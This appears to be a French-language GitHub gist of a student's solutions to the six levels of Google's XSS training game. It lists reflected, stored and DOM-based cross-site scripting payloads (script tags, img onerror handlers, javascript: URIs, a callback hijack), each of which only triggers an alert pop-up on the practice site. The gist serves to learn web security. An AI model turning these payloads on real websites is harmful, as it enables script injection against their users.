Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Hullaballo2001/4ba0b04c286d551be55501c19f46c654 to your computer and use it in GitHub Desktop.
Save Hullaballo2001/4ba0b04c286d551be55501c19f46c654 to your computer and use it in GitHub Desktop.
Quête Sécurité 3.1 [Basics] Attaques XSS : découvrir
dans le formulaire de recherche : <script>alert('hello')</script>
dans un post : <img src=x onerror="alert('Pop-up window via stored XSS');"
dans l'url : https://xss-game.appspot.com/level3/frame#3 >'>"><img src=x onerror=alert(0)>
dans le timer : ');alert(/xss 4/);('
dans email : javascript:alert("XSS") et dans l'url : https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('XSS')
dans l'url : https://xss-game.appspot.com/level6/frame#//google.com/jsapi?callback=alert
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment